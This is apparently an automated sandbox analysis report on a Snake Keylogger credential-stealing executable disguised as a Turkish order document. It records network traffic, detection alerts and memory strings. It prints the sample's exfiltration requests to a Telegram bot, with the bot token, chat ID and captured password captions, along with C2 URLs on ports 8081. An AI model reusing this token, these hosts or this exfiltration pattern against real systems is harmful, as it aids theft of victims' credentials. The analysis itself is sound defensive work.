                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2010/01/2025%20/%2001:33:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31724386f0b9Host: api.telegram.orgContent-Length: 585
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49706 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49705 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49759 -> 104.21.64.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49704 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2010/01/2025%20/%2001:33:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31724386f0b9Host: api.telegram.orgContent-Length: 585
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 18:09:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1310525073.0000000003402000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeString found in binary or memory: http://tempuri.org/DataSet2.xsd
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeString found in binary or memory: https://git.io/vblQ0
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49760 version: TLS 1.2
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 4692, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 2020, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_01793E404_2_01793E40
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_0179E5044_2_0179E504
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_01794B004_2_01794B00
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_017972884_2_01797288
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075AD6C04_2_075AD6C0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075A53B84_2_075A53B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075A00404_2_075A0040
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075AA0C84_2_075AA0C8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075ACF504_2_075ACF50
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075A7F204_2_075A7F20
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075A2B184_2_075A2B18
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075AE3D04_2_075AE3D0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075A42004_2_075A4200
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_075A6AF04_2_075A6AF0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B71CE84_2_07B71CE8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B755104_2_07B75510
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B74CB04_2_07B74CB0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B774A04_2_07B774A0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B71CD84_2_07B71CD8
